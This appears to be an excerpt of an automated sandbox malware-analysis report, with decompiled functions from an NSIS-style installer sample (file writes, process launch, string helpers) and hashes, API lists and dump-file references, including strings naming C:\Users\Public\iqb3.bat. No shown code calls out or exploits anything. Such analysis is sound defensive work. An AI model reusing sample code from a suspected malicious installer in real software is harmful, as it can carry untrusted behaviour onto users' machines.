                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsaB4A6.tmp
                                                                      • API String ID: 3248276644-3416995437
                                                                      • Opcode ID: e143d0bff1d3a1e97625ef6ed67efd149ba2b082c8de35daf5e76a6337fb6798
                                                                      • Instruction ID: 0290d7001013104458bc3aa2bb8d01bb7a9b645cc3bbf10b8819f4698bd01a3e
                                                                      • Opcode Fuzzy Hash: e143d0bff1d3a1e97625ef6ed67efd149ba2b082c8de35daf5e76a6337fb6798
                                                                      • Instruction Fuzzy Hash: F3F0C827105E5536D626323B1D45E9F2A49CD82328718853BFC61B22D1EA3CC863DD7E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00404F3D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 91%
                                                                      			E00404F3D(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t11;
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					__eflags = _t15 - 0x200;
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						__eflags = _t15 - 0x419;
						if(_t15 == 0x419) {
							__eflags =  *0x41fccc - _t16; // 0x0
							if(__eflags != 0) {
								_push(_t16);
								_push(6);
								 *0x41fccc = _t16;
								E00404914();
							}
						}
						L11:
						return CallWindowProcA( *0x41fcd4, _a4, _t15, _a12, _t16);
					}
					_t11 = IsWindowVisible(_a4);
					__eflags = _t11;
					if(_t11 == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404894(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 == 0x20) {
					E00404018(0x413);
					return 0;
				}
				goto L10;
			}






                                                                      0x00404f41
                                                                      0x00404f4b
                                                                      0x00404f61
                                                                      0x00404f67
                                                                      0x00404f89
                                                                      0x00404f8c
                                                                      0x00404f8c
                                                                      0x00404f92
                                                                      0x00404f94
                                                                      0x00404f9a
                                                                      0x00404f9c
                                                                      0x00404f9d
                                                                      0x00404f9f
                                                                      0x00404fa5
                                                                      0x00404fa5
                                                                      0x00404f9a
                                                                      0x00404faf
                                                                      0x00000000
                                                                      0x00404fbd
                                                                      0x00404f6c
                                                                      0x00404f72
                                                                      0x00404f74
                                                                      0x00404fac
                                                                      0x00404fac
                                                                      0x00000000
                                                                      0x00404fac
                                                                      0x00404f80
                                                                      0x00404f82
                                                                      0x00000000
                                                                      0x00404f82
                                                                      0x00404f51
                                                                      0x00404f58
                                                                      0x00000000
                                                                      0x00404f5d
                                                                      0x00000000

                                                                      APIs
                                                                      • IsWindowVisible.USER32 ref: 00404F6C
                                                                      • CallWindowProcA.USER32 ref: 00404FBD
                                                                        • Part of subcall function 00404018: SendMessageA.USER32(00010476,00000000,00000000,00000000), ref: 0040402A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                      • String ID:
                                                                      • API String ID: 3748168415-3916222277
                                                                      • Opcode ID: 5743c3f0d91b1bdb44f496c729a81979d009a58dbf752086bda617ff77998d14
                                                                      • Instruction ID: afe80570641b081ecec8a2a4254b7c73db9dd8a02ece8fbff1c9a9ba965e2ecd
                                                                      • Opcode Fuzzy Hash: 5743c3f0d91b1bdb44f496c729a81979d009a58dbf752086bda617ff77998d14
                                                                      • Instruction Fuzzy Hash: EB0175F110424AAFDF209F51DD81A9B3725E7C4750F144037FB007A2D1D7798C62AB69
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004024D1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E004024D1(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E004029FD(0x11));
				} else {
					E004029E0(1);
					 *0x4097b0 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405C55(_t17 + 8, _t15), "C:\Users\engineer\AppData\Roaming\Microsoft\Windows\Start Menu", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x423768 =  *0x423768 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                                                                      0x004024d1
                                                                      0x004024d1
                                                                      0x004024d4
                                                                      0x004024ef
                                                                      0x004024d6
                                                                      0x004024d8
                                                                      0x004024dd
                                                                      0x004024e4
                                                                      0x004024f6
                                                                      0x00402663
                                                                      0x00402663
                                                                      0x004024fc
                                                                      0x0040250e
                                                                      0x004015a6
                                                                      0x004015a8
                                                                      0x00000000
                                                                      0x004015ae
                                                                      0x004015a8
                                                                      0x00402895
                                                                      0x004028a1

                                                                      APIs
                                                                      • lstrlenA.KERNEL32(00000000,00000011), ref: 004024EF
                                                                      • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu,00000000,?,?,00000000,00000011), ref: 0040250E
                                                                      Strings
                                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu, xrefs: 004024DD, 00402502
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: FileWritelstrlen
                                                                      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu
                                                                      • API String ID: 427699356-2884239388
                                                                      • Opcode ID: 8eacd2d9b7f99dff19a7d48110e68cc3b05eb08ac038617508e0e838a67c6ccb
                                                                      • Instruction ID: ec6543fef349a6256ae9c0be30bf33b46acbb68c9f58cc1a2edee276f495746f
                                                                      • Opcode Fuzzy Hash: 8eacd2d9b7f99dff19a7d48110e68cc3b05eb08ac038617508e0e838a67c6ccb
                                                                      • Instruction Fuzzy Hash: 71F089B2A14244BFEB40EBA49E49AAB7768DB40304F10443BB142F61C2D6FC4941EB6D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 100020BE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29librarystringloaderCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 58%
                                                                      			E100020BE(void* __eax, void* __ebx, void* __esi) {
				void* _t11;
				void* _t16;

				_t16 = __esi;
				_t11 = __eax;
				_push(ss);
			}





                                                                      0x100020be
                                                                      0x100020be
                                                                      0x100020be

                                                                      APIs
                                                                      • GetProcAddress.KERNEL32(?), ref: 100020C9
                                                                      • lstrlenA.KERNEL32(00000408), ref: 100020E3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.757682389.0000000010001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000002.00000002.757659819.0000000010000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                      • Associated: 00000002.00000002.757713257.0000000010003000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                      • Associated: 00000002.00000002.757732274.0000000010005000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_10000000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProclstrlen
                                                                      • String ID: Net
                                                                      • API String ID: 2233632393-515476347
                                                                      • Opcode ID: a52bc2bcc3f257b4c552fc767f28df59fa30245e2d4c6c4ba3938b03f9c46049
                                                                      • Instruction ID: 075abd61b20d7dd9549bf19d6b5a87a004d411dfe0bb2d84e287a259ff6eee62
                                                                      • Opcode Fuzzy Hash: a52bc2bcc3f257b4c552fc767f28df59fa30245e2d4c6c4ba3938b03f9c46049
                                                                      • Instruction Fuzzy Hash: 0DF08C31600712DEEB609F259C844A6F7E4FB403D6B10C93EE6EA80065DB3494858F50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00405491 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00405491(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x4214e8->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x4214e8,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                                      0x0040549a
                                                                      0x004054b6
                                                                      0x004054be
                                                                      0x004054c3
                                                                      0x00000000
                                                                      0x004054c9
                                                                      0x004054cd

                                                                      APIs
                                                                      • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004214E8,Error launching installer), ref: 004054B6
                                                                      • CloseHandle.KERNEL32(?), ref: 004054C3
                                                                      Strings
                                                                      • Error launching installer, xrefs: 004054A4
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateHandleProcess
                                                                      • String ID: Error launching installer
                                                                      • API String ID: 3712363035-66219284
                                                                      • Opcode ID: 44df9076715bb7e151bebb2f5864405cbbd02c1cd51f3942059a2279cc9d8a17
                                                                      • Instruction ID: 3eb9eeac69da88a372b0c135ba7ac0e5d0d4abdecbe03941738571e2a7ac68f4
                                                                      • Opcode Fuzzy Hash: 44df9076715bb7e151bebb2f5864405cbbd02c1cd51f3942059a2279cc9d8a17
                                                                      • Instruction Fuzzy Hash: 31E0E674A0020AABDB10EFA4DD4596F7BBDEB10305B408531B914E2160D774D810CA79
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004036D2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E004036D2() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x41eca4; // 0x57d778
				_t3 = E004036B7(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x41eca4 =  *0x41eca4 & 0x00000000;
				return _t3;
			}







                                                                      0x004036d3
                                                                      0x004036db
                                                                      0x004036e2
                                                                      0x004036e5
                                                                      0x004036e5
                                                                      0x004036e7
                                                                      0x004036ec
                                                                      0x004036f3
                                                                      0x004036f9
                                                                      0x004036fd
                                                                      0x004036fe
                                                                      0x00403706

                                                                      APIs
                                                                      • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,746AF560,004036A9,746AFA90,004034D6,?), ref: 004036EC
                                                                      • GlobalFree.KERNEL32 ref: 004036F3
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004036E4
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: Free$GlobalLibrary
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 1100898210-3936084776
                                                                      • Opcode ID: 46109c7d5e8f7901f06fb38b4e0fa0f424bccadd35d86ca9fbc9df7497a0603c
                                                                      • Instruction ID: d9d7596a2fa150d819e6a74e3d7b6637a3ae96b25f0f67a325cd61ef5fdce0bc
                                                                      • Opcode Fuzzy Hash: 46109c7d5e8f7901f06fb38b4e0fa0f424bccadd35d86ca9fbc9df7497a0603c
                                                                      • Instruction Fuzzy Hash: 98E08C32801020ABC6215F65AD0475ABB687F88B22F06082AE8007B3A09BB66C815AC9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004057B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E004057B5(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                                                      0x004057b6
                                                                      0x004057c0
                                                                      0x004057c2
                                                                      0x004057c9
                                                                      0x004057d1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004057d1
                                                                      0x004057d3
                                                                      0x004057d8

                                                                      APIs
                                                                      • lstrlenA.KERNEL32(80000000,C:\Users\Public,00402CE5,C:\Users\Public,C:\Users\Public,C:\Users\Public\iqb3.bat,C:\Users\Public\iqb3.bat,80000000,00000003), ref: 004057BB
                                                                      • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\Public,00402CE5,C:\Users\Public,C:\Users\Public,C:\Users\Public\iqb3.bat,C:\Users\Public\iqb3.bat,80000000,00000003), ref: 004057C9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: CharPrevlstrlen
                                                                      • String ID: C:\Users\Public
                                                                      • API String ID: 2709904686-2272764151
                                                                      • Opcode ID: c27a981e79bb352b20b7a8c74a9367836393bd04b8b6ccbc39cacac652a51138
                                                                      • Instruction ID: 707dbef540ece1ff312b000549851e46262dd825b0763663a0da280226ece44d
                                                                      • Opcode Fuzzy Hash: c27a981e79bb352b20b7a8c74a9367836393bd04b8b6ccbc39cacac652a51138
                                                                      • Instruction Fuzzy Hash: A4D0A76241CE705EF30352149C00B8F6A58CF12700F090462E180A7591C27C0D414BBE
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 100010E0 Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E100010E0(void* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char* _t17;
				char _t19;
				void* _t20;
				void* _t24;
				void* _t27;
				void* _t31;
				void* _t37;
				void* _t39;
				void* _t40;
				signed int _t43;
				void* _t52;
				char* _t53;
				char* _t55;
				void* _t56;
				void* _t58;

				 *0x1000405c = _a8;
				 *0x10004060 = _a16;
				 *0x10004064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004038, E10001573, _t52);
				_t43 =  *0x1000405c +  *0x1000405c * 4 << 2;
				_t17 = E1000123B();
				_a8 = _t17;
				_t53 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_a8);
				} else {
					do {
						_t19 =  *_t53;
						_t55 = _t53 + 1;
						_t58 = _t19 - 0x6c;
						if(_t58 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t53 = _t55 + 1;
								_t24 = E10001278(E100012BF( *_t55 - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t27 = _t20;
							if(_t27 == 0) {
								L10:
								_t53 = _t55 + 1;
								_t24 = E100012E8( *_t55 - 0x30, E1000123B());
								goto L13;
							}
							L7:
							if(_t27 == 1) {
								_t31 = GlobalAlloc(0x40, _t43 + 4);
								 *_t31 =  *0x10004030;
								 *0x10004030 = _t31;
								E10001525(_t31 + 4,  *0x10004064, _t43);
								_t56 = _t56 + 0xc;
							}
							goto L14;
						}
						if(_t58 == 0) {
							L17:
							_t34 =  *0x10004030;
							if( *0x10004030 != 0) {
								E10001525( *0x10004064, _t34 + 4, _t43);
								_t37 =  *0x10004030;
								_t56 = _t56 + 0xc;
								GlobalFree(_t37);
								 *0x10004030 =  *_t37;
							}
							goto L14;
						}
						_t39 = _t19 - 0x4c;
						if(_t39 == 0) {
							goto L17;
						}
						_t40 = _t39 - 4;
						if(_t40 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L12;
						}
						_t27 = _t40;
						if(_t27 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t53 != 0);
					goto L16;
				}
			}


















                                                                      0x100010e7
                                                                      0x100010ef
                                                                      0x10001103
                                                                      0x1000110b
                                                                      0x10001116
                                                                      0x10001119
                                                                      0x10001121
                                                                      0x10001124
                                                                      0x10001126
                                                                      0x100011c4
                                                                      0x100011d0
                                                                      0x1000112c
                                                                      0x1000112d
                                                                      0x1000112d
                                                                      0x10001130
                                                                      0x10001131
                                                                      0x10001134
                                                                      0x10001203
                                                                      0x10001206
                                                                      0x1000119e
                                                                      0x100011a4
                                                                      0x100011ac
                                                                      0x100011b1
                                                                      0x100011b4
                                                                      0x00000000
                                                                      0x100011b4
                                                                      0x10001209
                                                                      0x1000120a
                                                                      0x10001186
                                                                      0x1000118c
                                                                      0x10001194
                                                                      0x00000000
                                                                      0x10001194
                                                                      0x10001152
                                                                      0x10001153
                                                                      0x1000115b
                                                                      0x10001168
                                                                      0x10001170
                                                                      0x10001179
                                                                      0x1000117e
                                                                      0x1000117e
                                                                      0x00000000
                                                                      0x10001153
                                                                      0x1000113a
                                                                      0x100011d1
                                                                      0x100011d1
                                                                      0x100011d8
                                                                      0x100011e5
                                                                      0x100011ea
                                                                      0x100011ef
                                                                      0x100011f5
                                                                      0x100011fb
                                                                      0x100011fb
                                                                      0x00000000
                                                                      0x100011d8
                                                                      0x10001140
                                                                      0x10001143
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001149
                                                                      0x1000114c
                                                                      0x1000119b
                                                                      0x00000000
                                                                      0x1000119b
                                                                      0x1000114f
                                                                      0x10001150
                                                                      0x10001183
                                                                      0x00000000
                                                                      0x10001183
                                                                      0x00000000
                                                                      0x100011ba
                                                                      0x100011ba
                                                                      0x00000000
                                                                      0x100011c3

                                                                      APIs
                                                                        • Part of subcall function 1000123B: lstrcpyA.KERNEL32(00000000,?,?,?,100014DE,?,10001020,10001019,00000001), ref: 10001258
                                                                        • Part of subcall function 1000123B: GlobalFree.KERNEL32 ref: 10001269
                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
                                                                      • GlobalFree.KERNEL32 ref: 100011B4
                                                                      • GlobalFree.KERNEL32 ref: 100011C7
                                                                      • GlobalFree.KERNEL32 ref: 100011F5
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.757682389.0000000010001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000002.00000002.757659819.0000000010000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                      • Associated: 00000002.00000002.757713257.0000000010003000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                      • Associated: 00000002.00000002.757732274.0000000010005000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_10000000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Free$Alloclstrcpy
                                                                      • String ID:
                                                                      • API String ID: 852173138-0
                                                                      • Opcode ID: 4e74f259284b15c0abdbbb14bcbb83fd77e67e423db5dae0e516b4deb947cba3
                                                                      • Instruction ID: 26a7307167ea038f6128c28db1d5d02e0c11c1c5116c5a7ce728bb40d8b914e2
                                                                      • Opcode Fuzzy Hash: 4e74f259284b15c0abdbbb14bcbb83fd77e67e423db5dae0e516b4deb947cba3
                                                                      • Instruction Fuzzy Hash: E431BAB2808254AFF705CF64EC89AEA7FE8EB052C0B164116FA45D626CDB349910CB28
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004058D4 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E004058D4(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                                      0x004058e4
                                                                      0x004058e6
                                                                      0x004058e9
                                                                      0x00405915
                                                                      0x004058ee
                                                                      0x004058f7
                                                                      0x004058fc
                                                                      0x00405907
                                                                      0x0040590a
                                                                      0x00405926
                                                                      0x0040590c
                                                                      0x00405913
                                                                      0x00000000
                                                                      0x00405913
                                                                      0x0040591f
                                                                      0x00405923
                                                                      0x00405923
                                                                      0x0040591d
                                                                      0x00000000

                                                                      APIs
                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B03,00000000,[Rename],00000000,00000000,00000000), ref: 004058E4
                                                                      • lstrcmpiA.KERNEL32(00405B03,00000000,?,00000000,00405B03,00000000,[Rename],00000000,00000000,00000000), ref: 004058FC
                                                                      • CharNextA.USER32(00405B03,?,00000000,00405B03,00000000,[Rename],00000000,00000000,00000000), ref: 0040590D
                                                                      • lstrlenA.KERNEL32(00405B03,?,00000000,00405B03,00000000,[Rename],00000000,00000000,00000000), ref: 00405916
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 190613189-0
                                                                      • Opcode ID: 0add82ed76356020c4ee8264c56a6ad6875436601f5ed096891bbb40787d2247
                                                                      • Instruction ID: 62085d2c31476900ff85a65f94f7eb43c3272102ba613799eb3dd48313e2814d
                                                                      • Opcode Fuzzy Hash: 0add82ed76356020c4ee8264c56a6ad6875436601f5ed096891bbb40787d2247
                                                                      • Instruction Fuzzy Hash: 12F0C232604418FFC7129FA5DC0099EBBA8EF46360B2140A9E800F7210D674EF019BA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%